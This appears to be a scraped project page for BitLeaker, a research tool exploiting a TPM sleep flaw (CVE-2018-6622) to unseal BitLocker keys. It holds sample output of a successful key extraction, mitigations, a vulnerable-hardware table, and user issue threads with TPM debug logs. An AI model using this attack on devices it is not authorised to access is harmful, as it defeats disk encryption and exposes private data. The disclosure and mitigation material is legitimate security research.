00000040  8b cd 2e 22 14 3d 14 7b  dd 9b 1b 4f 38 fe 3a 44  |...".=.{...O8.:D|
00000050  54 c4 96 94 0e 41 a4 dd  4c a9 ca 76 3e 33 00 00  |T....A..L..v>3..|
00000060  00                                                |.|
    [>>] Success

Mount BitLocker-locked Partition with VMK.
    [>>] VMK = 10C7EA906D6DA4821F96CC816606E912FA0456B35A5C1161FCC5AA746A23F54B
    [>>] Create VMK data... Success
    [>>] Mount BitLocker-Locked partition(/dev/nvme0n1p4)...

Mon Dec  2 01:14:07 2019 [INFO] dislocker by Romain Coltel, v0.7.1 (compiled for Linux/x86_64)
Mon Dec  2 01:14:07 2019 [INFO] Compiled version: master:dcd6b9b
Mon Dec  2 01:14:07 2019 [INFO] Volume GUID (INFORMATION OFFSET) supported
Mon Dec  2 01:14:07 2019 [INFO] BitLocker metadata found and parsed.
Mon Dec  2 01:14:07 2019 [INFO] Used VMK file decryption method
Mon Dec  2 01:14:07 2019 [INFO] Found volume's size: 0xba7bffe00 (50059017728) bytes
Mon Dec  2 01:14:07 2019 [INFO] Running FUSE with these arguments: 
Mon Dec  2 01:14:07 2019 [INFO]   `--> 'dislocker'
Mon Dec  2 01:14:07 2019 [INFO]   `--> './windows'

4. Mitigations

The root cause of CVE-2018-6622 and related vulnerability are improper handling of an abnormal sleep case, and you can remove the vulnerability by following two options.

Use Microsoft's BitLocker with a PIN: If you use a PIN with a TPM, VMK of BitLocker cannot be extracted without PIN.

Updating the latest BIOS firmware to your system: We reported the vulnerability to major manufacturers such as Intel, Dell, and Lenovo. They already released new firmware.
Disable sleep feature in your BIOS: Recent BIOS firmware has a feature that disables sleep for several reasons. Therefore, please enter your BIOS setup and disable sleep.

5. Test Results

Model	Status	BIOS Vendor	BIOS Version	BIOS Release Date (MM/DD/YY)	TPM 2.0 Manufacturer	Vendor String
Intel NUC8i7HVK	Vulnerable	Intel	J68196-503	12/17/2018	Intel, fTPM	Intel
Intel NUC5i5MYHE	Vulnerable	Intel	MYBDWi5v.86A.0055.2019.0820.1505	08/20/2019	Infineon (IFX), dTPM	SLB9665
HP EliteDesk 800 G4	Safe	HP	Q21	02/15/2019	Infineon (IFX), dTPM	SLB9670
Dell Optiplex 7060	Safe	Dell	1.4.2	06/11/2019	NTC, dTPM	rls NPCT
ASUS Q170M-C	Vulnerable	American Megatrends Inc.	4212	07/24/2019	Infineon (IFX), dTPM	SLB9665
ASUS PRIME Z390-A	Safe	American Megatrends Inc.	1302	09/02/2019	Intel, fTPM	Intel
ASRock Z390 Extreme	Safe	ASRock	P4.20	07/29/2019	Intel, fTPM	Intel
GIGABYTE AORUS Z390 Elite	Safe	American Megatrends Inc.	F8	06/05/2019	Intel, fTPM	Intel
GIGABYTE Z370-HD3	Safe	American Megatrends Inc.	F13	08/13/2019	Intel, fTPM	Intel
MSI MAG Z390M MORTAR	Safe	American Megatrends Inc.	1.50	08/08/2019	Intel, fTPM	Intel

6. Known Issues

Some machines turn off the power of a USB storage while S3 sleeping state and could not connect it again. In this case, please plug the USB storage into "always powered port" of your system.
Ubuntu 18.04 sometimes failed to find a TPM in your system. In this case, please reboot and try it again.
If Secure Boot is enabled, you need to add the BitLeaker bootloader with the MOK manager.

bitleaker's People

Contributors

Stargazers

Watchers

bitleaker's Issues

sha1 pcr?

I am attempting to recover my personal data. I first used napper, which reports my system is vulnerable. However when I run bitleaker, I get the following "Get PCR data from bitleaker driver.. Fail". Does the bitleaker driver support sha1 pcr data, and is it possible to recover my data using bitleaker?

.

Does bitleaker have a log?

I was wondering if bitleaker has some kind of log for when you are attempting to boot windows to discover what the TPM messaging looks like? If so, how can I activate it? If not, do you have any ideas on how to implement one? I don't know what kind of logging grub already has available. My current quick approach would be a video camera I guess.

TPM2_Load failure

I'm having a somewhat similar problem to #9. I'm attaching my bitleaker log: log.txt

I'm fairly new to TPM, so I've been trying to understand what is happening. As far as I can tell, bitleaker reads a binary blob from dislocker, and that is supposed to contain 220 bytes of the priv/pub object, and the rest is something else.

Here is the snippet that dislocker is returning:

Tue May  2 10:34:49 2023 [DEBUG] Total datum size: 0x012e (302) bytes
Tue May  2 10:34:49 2023 [DEBUG] Datum entry type: 0
Tue May  2 10:34:49 2023 [DEBUG]    `--> ENTRY TYPE UNKNOWN 1
Tue May  2 10:34:49 2023 [DEBUG] Datum value type: 6
Tue May  2 10:34:49 2023 [DEBUG]    `--> TPM_ENCODED -- Total size header: 12 -- Nested datum: no
Tue May  2 10:34:49 2023 [DEBUG] Status: 0x1
Tue May  2 10:34:49 2023 [DEBUG] Unknown: 0x815
Tue May  2 10:34:49 2023 [DEBUG] Payload:
Tue May  2 10:34:49 2023 [DEBUG] 0x00000000 00 aa 00 20 5d 12 f2 03-70 ef 92 d1 a5 05 e7 c6 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000010 a9 5f 6f 24 e9 d1 66 c6-be 0a a8 d9 c6 07 24 cf 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000020 57 9e cd 47 00 10 7d 34-bb d9 51 a9 aa aa 33 6b 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000030 6c c7 b1 c6 ac ae 7b 43-66 80 ab a9 cb 50 08 f1 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000040 53 84 f5 ac 2f ae 0b d1-54 60 df 71 39 2b 95 31 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000050 99 e3 45 1b cc a8 f6 da-d4 b0 05 e0 60 09 ce 89 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000060 5f c0 8e 72 86 03 62 7d-1c 1d 3e b5 9a 02 67 0b 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000070 35 23 a1 e8 33 e6 f0 ef-38 5d 7d e1 bd ce 48 32 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000080 e9 ca 0a ff a8 87 ab 89-53 fa d7 eb 51 0f 9c c2 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000090 56 b3 b3 f2 a4 41 50 7a-5a d0 b8 06 7f 84 8c 59 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000a0 1b c5 05 69 ed 16 f2 85-49 04 06 03 00 4e 00 08 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000b0 00 0b 00 00 04 12 00 20-f5 10 e7 eb cb a2 25 bc 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000c0 21 68 c2 23 d6 eb 84 1e-7c 03 2c f1 28 1f e5 ab 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000d0 23 c3 73 7e 8a d2 f7 ef-00 10 00 20 75 ff bf 4e 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000e0 cd c7 63 24 ba 6b b7 96-e3 b6 ef 36 e8 80 89 fe 
Tue May  2 10:34:49 2023 [DEBUG] 0x000000f0 57 17 6d d2 a2 be 41 92-42 6b d3 cb 00 20 0a 5b 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000100 7b 84 98 30 8a dc 33 ea-b7 6f 81 6b 7a cb 9d 0d 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000110 91 ab 73 a2 13 74 a3 2b-06 c5 93 7f c9 da 03 15 
Tue May  2 10:34:49 2023 [DEBUG] 0x00000120 08 00 
Tue May  2 10:34:49 2023 [DEBUG] Header safe: 0x12e, 0, 0x6, 0x1
Tue May  2 10:34:49 2023 [DEBUG] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The private portion is 0xaa bytes long. So the public portion should start at 0xac. The size of the public portion is then 0x4e, and so it should end at 0xae + 0x4e = 0xfc. But 0xfc > 0xdc == 220. So it seems like maybe my keys are 0x20 bytes larger than usual, and bitleaker is truncating them, which causes the TPM2_Load to fail?

I am not sure if it is relevant, but I have SecureBoot disabled, and I am running Windows 11.

I'll try to change 220 to 0xfc in bitleaker.py and see if that fixes the TPM error.

Integrate Bitleaker into Kali Linux

Is it possible to integrate Bitleaker into Kali Linux ISO?
I ran ./bootstrap in Cubic, but Build BitLeaker kernel module failed:
make[1]: *** /lib/modules/5.15.0-47-generic/build: No such file or directory. Stop.
make: *** [Makefile:4: all] Error 2

"Clone BitLeaker Bootloader repository and build it" also failed
make[2]: *** [Makefile:6575: grub-core/partmap/libgrubkern_a-gpt.o] Error 1
make[1]: *** [Makefile:11506: all-recursive] Error 1
make[1]: Leaving directory '/git/bitleaker/bitleaker-grub'
make: *** [Makefile:3562: all] Error 2
./build.sh: line 9: ../grub-mkimage: No such file or directory
sudo: unable to resolve host cubic: Temporary failure in name resolution
cp: cannot stat 'grub-core/grubx64.efi': No such file or directory

Bitleaker targeted the wrong partition?

The targeted disk has 5 partitions

sda4 should be the primary system drive for Windows.

When I ran bitleaker.py, the program runs normally but ends with an error :

BitLeaker: Error. /dev/sda3 is not BitLocker-locked partition

implicit declaration of function ‘ioremap_nocache

Any chance to fix this error (newest ubuntu):

error: implicit declaration of function ‘ioremap_nocache’ [-Werror=implicit-function-declaration]
60 | buffer = (char*) ioremap_nocache(RESERVED_START, RESERVED_SIZE);
| ^~~~~~~~~~~~~~~
/home/karol/bitleaker/bitleaker-kernel-module/bitleaker-kernel-module.c:60:18: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast]
60 | buffer = (char*) ioremap_nocache(RESERVED_START, RESERVED_SIZE);
| ^
/home/karol/bitleaker/bitleaker-kernel-module/bitleaker-kernel-module.c:85:9: error: implicit declaration of function ‘iounmap’; did you mean ‘do_munmap’? [-Werror=implicit-function-declaration]
85 | iounmap(buffer);
| ^~~~~~~
| do_munmap
cc1: some warnings being treated as errors
make[2]: *** [scripts/Makefile.build:257: /home/karol/bitleaker/bitleaker-kernel-module/bitleaker-kernel-module.o] Error 1
make[1]: *** [Makefile:1850: /home/karol/bitleaker/bitleaker-kernel-module] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-5.19.0-38-generic'
make: *** [Makefile:4: all] Error 2
Finished.

Grub cannot read Event Log

Hi,

I checked the device with napper (and it said the device is vulnerable). I installed an Ubuntu 18.04 on an USB stick and build the bitleaker tool.
When i start the stick, it says that the uefi event log cannot be read due to invalid parameters. On another machine, grub can read the event log, but the device is not vulnerable. The differences of the two devices is, that the vulnerable device uses an Intel fTPM and the other a dTPM.
Has anyone a clue, where the error is? I changed nothing.

PCR get data from bitleaker driver fail?

Hi
Napper working and get pcr vulnerable
Why in bitleaker fail.
And how change drive like /dev/sda3
To /dev/sda5
Sda3 is no lock
Sda5 have bitlock

V1 Steps?

Hi. I was asking before about V1 code. I modified your code to use either the V1 or the V2 code depending on which key you press at boot time. I've been working on trying to get the script to work. I've been able to get most of the pieces, but I wanted to find out if there was a SHA1 that needed to be used for the signature? I've checked a few things (I monitored the LPC bus, and checked against the data you recovered). And I still seem to be missing something, as I get all the way to the Unseal command and it fails. I can't give you direct logs or anything now because I don't have the system available. Unfortunately, I don't have a compiler handy to compile PCRTool, which I believe would be helpful, but I can't find an executable, just source code (I can't compile on my target. No compiler). Also, it seems that there might be more things sent to the TPM than got logged. Maybe there is another way to check this Windows TPM logs?

This isn't really a bug, but there didn't seem like a better place to put this.

Napper 1.3 is stacking without no results at the "Reading PCR values of TPM and checking a vulnerability ..." step

Hi, I'm trying to recover my data from my Dell Latitude 5511 laptop, as I cannot recover the recovery key since I've never activated bitlocker.
I found your amazing project and I thought perhaps I have a chance to get back my data.
I run Napper 1.3 live cd but after starting Napper, it seems to stack with no progress at the "Napper 1.3 is stacking without no results at the "Reading PCR values of TPM and checking a vulnerability ..." , I noted that there is an error, I will add a picture to let you understand better my problem

Can you please help me?

Output Size 10, Reults: Fail! (after success to Unseal data etc.)

Hi There,

I wonder if you can help.

I'm trying to mount a Windows 10 partition that is currently locked by TPM. (TPM with Secure Boot ON appears to unlock the drive and try to boot the Windows partition).

Bitleaker appears to be my last hope.

When running this tool on a USB setup of Ubuntu 18.04.6 LTS (in UEFI mode) I get the below results:

Preparing TPM data.
    [>>] Get TPM-encoded blob from dislocker... Success
    [>>] Convert TPM-encoded blob to hex data... Success
    [>>] Create TPM2_Load data... Success
    [>>] Create TPM2_StartSession data... Success
    [>>] Create TPM2_PolicyAuthorize data... Success
    [>>] Create TPM2_PolicyPCR data... Success
    [>>] Create TPM2_Unseal data... Success

Execute TPM commands
    [>>] Execute TPM2_Load... Input file tpm2_load.bin
Initializing Local Device TCTI Interface
    [*] Input Size 247
00000000  80 02 00 00 00 f7 00 00  01 57 81 00 00 01 00 00  |.........W......|
00000010  00 09 40 00 00 09 00 00  00 00 00 00 8a 00 20 ba  |..@........... .|
00000020  75 54 35 6a 9f e1 13 d5  45 a8 c0 5a 71 05 a1 f2  |uT5j....E..Zq...|
00000030  94 54 3f 5d f2 6e de b4  b8 54 70 73 7f 42 11 00  |.T?].n...Tps.B..|
00000040  10 34 f2 6e e4 c9 f2 71  a7 c6 5a d6 c1 d5 10 5c  |.4.n...q..Z....\|
00000050  02 ef d5 11 c4 dd 4c 17  07 0b 2f ce 14 71 6e 61  |......L.../..qna|
00000060  ac 54 0a d4 22 d7 b9 42  f7 08 a0 b0 d4 f8 a3 45  |.T.."..B.......E|
00000070  8e 18 e9 e7 c8 2b 40 8e  e2 ff 2c a5 72 1b d0 b7  |.....+@...,.r...|
00000080  86 85 79 84 44 39 1d 0c  9b 3c 00 3a 16 cd f6 28  |..y.D9...<.:...(|
00000090  48 e3 5d e9 dd bf d7 2e  de 1b ed f2 a1 a1 d1 e9  |H.].............|
000000a0  48 32 3e fd 69 fb 8e 00  4e 00 08 00 0b 00 00 04  |H2>.i...N.......|
000000b0  12 00 20 50 03 70 af 37  9b 13 5f fd a0 d4 fd 9f  |.. P.p.7.._.....|
000000c0  d3 8f 1a ae 99 b4 5d ef  7f b8 65 07 53 47 ff de  |......]...e.SG..|
000000d0  18 a0 0c 00 10 00 20 53  57 d7 1a c7 40 6d 99 81  |...... SW...@m..|
000000e0  db 50 37 d5 5d de 55 9b  89 9a d6 79 4b 16 7a 9a  |.P7.].U....yK.z.|
000000f0  e6 63 d1 50 ce b6 30                              |.c.P..0|

    [*] Output Size 10, Result: Fail!
00000000  80 01 00 00 00 0a 00 00  01 8b                    |..........|
    [>>] Fail

Any idea what I can do to proceed please?

I currently have Secure Boot disabled i the BIOS to allow me to get to this stage.

I did notice it's showing PCR 0 at the start though?

    BitLeaker v1.0 for decrypting BitLocker with the TPM vulnerability
             Made by Seunghun Han, https://kkamagui.github.io
           Project link: https://github.com/kkamagui/bitleaker 

Search for BitLocker-locked partitions.
    [>>] BitLocker-locked partition is [/dev/sda4]

Loading BitLeaker kernel module... Success
Entering sleep...
    [>>] Please press any key or power button to wake up...
Waking up...
    [>>] Please press any key to continue...

Preparing PCR data.
    [>>] Get PCR data from BitLeaker driver... Success

Cut and extract essential PCR data.
    [>>] Extract PCR numbers and SHA256 hashes... Success

Replay TPM data.
    [>>] Checking the resource manager process... Success
    [>>] PCR 0 , SHA256 = 69614becb0612e90ed4f22ed22318184a3ad475b27cd17c738a2f6f6ca68194d
PCR Num 0
69614becb0612e90ed4f22ed22318184a3ad475b27cd17c738a2f6f6ca68194d

Bitleaker bootloader is not published

When trying to run bootstrap, it attempts this step:

git clone https://github.com/kkamagui/bitleaker-grub.git

However, that repository doesn't seem to be published yet. Are you planning on releasing that?

Find "[deep]" string from /sys/power/mem_sleep

For checking the S3 sleep feature of the system, it's needed to find "[deep]" string from /sys/power/mem_sleep like below.

$> cat /sys/power/mem_sleep
s2idle [deep]

Thank you for @roboknight.

Napper 1.3 is stacking without no results at the "Reading PCR values of TPM and checking a vulnerability"

Hi, I am also trying to run napper (liveCD) to check vulnerability.
Unfortunately it stucks at the Stage "Reading PCR values of TPM and checking a vulnerability".
I also run resourcemgr and tpm2_listpcrs.
Will try to attach logs.

what could have gone wrong? Notebook Futjitsu.

How make bitleaker USB

Great job!!!!
Maybe you are planning to release a ready bitleaker USB version (.iso) ? I want to test this on my system.
Or maybe you can give some advice how can I do it myself (how to create a bootable bitleaker USB).

Thank you!

Get PCR data from BitLeaker driver... Fail

Failed at getting PCR data from BitLeaker driver. No more details directly available. Is this error code common?
I was able to get some PCR output from napper-for-tpm, but no success with bitleaker.

Alienware 15 R3 Intel PTT, secure boot disabled

root@ubuntu:~/bitleaker# ./bitleaker.py
,║▒▒▒▒▒▒@╖
╥▒▒╝ ▒▒▒╢
]▒▒╢ ]▒▒╢
]▒▒▒ j▒▒╢
, ,╖║▒▒▒
,╓╖, ╓@╬@╥╥╬╣╢╢▓▓ ╖▒╖▒╙▒▒▒░░░▒░▒▒▒▒.
║╬@▓╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[ ╜╜╜╢╢▒▒░░░░░░▒@▓▓▄▒▒▒▒╖
╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[ ░░░░░╙╢▓╣╬▓▓@@▓▓@░░æ▓▓▓[
╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢..[ ░░░░░ ░▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒H
╢ ╢ ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢▒▒╢╢╢[ ..╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢ ░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[ ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢[ ¿░░░,░░░░░░░▒▒▒▒▒▒▒▒▒▒╢╢╢╢╢╢[ ╢╢╢╢╢╢╢╢╢ ╢╢╢╢╢╢╢╢╢╢╢╢░░░░░░░░░░░░╣▓▓@░░░▒▒▒▒▒▒▒▒▒▒╫╣╣╣▓▓[ ╙╙ ╙╬ ╨╜╙╬╢╢╢╣╣╢╢╢░░░░░░░░░░░░░░░░╫▓@▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓[ ,,, ,░░░░░░░░░░╙╨░░░░░░░░░░░░░░░░░░▓▒▒▒▓▓▓▓▓▓▓▓▓▓▓▀"
,,.░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░]▒░░░╙╢▒▓╣▓▒▒▒▒ ]
▐▓█████▄░░░░▒░░░░░░░░░░░░░░░░░░░░░░░░░░╟▒▒▒▒▒▒▒▒▒╣▓╢╢╢ ░░
▐▓▓██████████▄░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▓╢▒▒▒▒╢▓╢╢▒┌░░
▐▓▓█████████████████▄░░░▒▒░░▒▒▒▒▒▒▒╢╢╢╢╢╢Ñ▒▒▓╢▒▒▒▒▓╣╢╜▒░░
╜▓▓██▀████████████████▌║▒▒▒▒╢╢╢╢╣╢╢╢╣╣╣╣╣╣╣╝╣▒▒╢▓" ▒░░
"╙``╙╣▀█▀▀██████████▌╢╢╢╢╢╢╢╣╣╣╣╣╢Ñ╜╨Ñ╝ ╙ ,, ▒▒▒
" "╨╢▀▀▓▓███▌╢╣╣╣╣╣╣╜╜╨╨╜ ▄, ░░ ,▌ ░░▒▒▒ ░ e ╙╣▓▌Ñ╜╙╙╜ ▌▓ ░░░ ░░░░░▒▒▒
░░░░╧╤░░░ , , ▐░ ░░░░ ░░░░░░░░█▐░▒░▒▒▒
░░░░,░░░░░░ ▐, j▌█ ░ ░░░░░░░░░░░▐░░▒░░░░░░░▒░▒▒▒
░░░░▌█░░░░░░░░░░░░ ░░░░░░░░░░░░╪░░░░░░░░░░░▒░░▒░▒▌▒▒▒▒▒▒`
▒▒▒▒░▒▒▒▒▒▒░░æ▄▒░▒▒░░æ▄▒▒▒▒▒▒▒▒▌▓▒▒▒▒▒▒▒æ▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒
]▒▒▒▒░▒▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒╬▒▒▒▒▒▒▒▒▒▐▌▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
└ ▒░░▒▒▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒]▒░▒▒░▒░▒▒▒░▒▒▒░░░ ░░░; ░░
▒░░▒▒░▒║░▒▒▒▒▒▒░▒▒▒▒▒░▒]▒▒]░░▒▒░░ ░░▒░▒░▒░░ ░░ ⌡ ░
░ ░░▒░▒] ░░▒░▒░░▒▒░]░░▒;▒▒]░░░░ ░ ░░j░░░▒░ ░ !
░▒L░░└ ░░ ░▒ ░ ░░▒!▒▒ ░ ░ ░ ░░└ ░ ▒
▒L░ ░▒ ░ ░ ░ ░ ░ └ ░

BitLeaker v1.0 for decrypting BitLocker with the TPM vulnerability
         Made by Seunghun Han, https://kkamagui.github.io
       Project link: https://github.com/kkamagui/bitleaker

Search for BitLocker-locked partitions.
[>>] BitLocker-locked partition is [/dev/nvme0n1p3]

Loading BitLeaker kernel module... Success
Entering sleep...
[>>] Please press any key or power button to wake up...
Waking up...
[>>] Please press any key to continue...

Preparing PCR data.
[>>] Get PCR data from BitLeaker driver... Fail

TPM2_Load response too short?

Everything appears to be working beautifully but the data seems to be a lot shorter than the other logs I have seen which is causing it to fail. The unit is a NUC using Intel PTT

Any ideas would be greatly appreciated

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.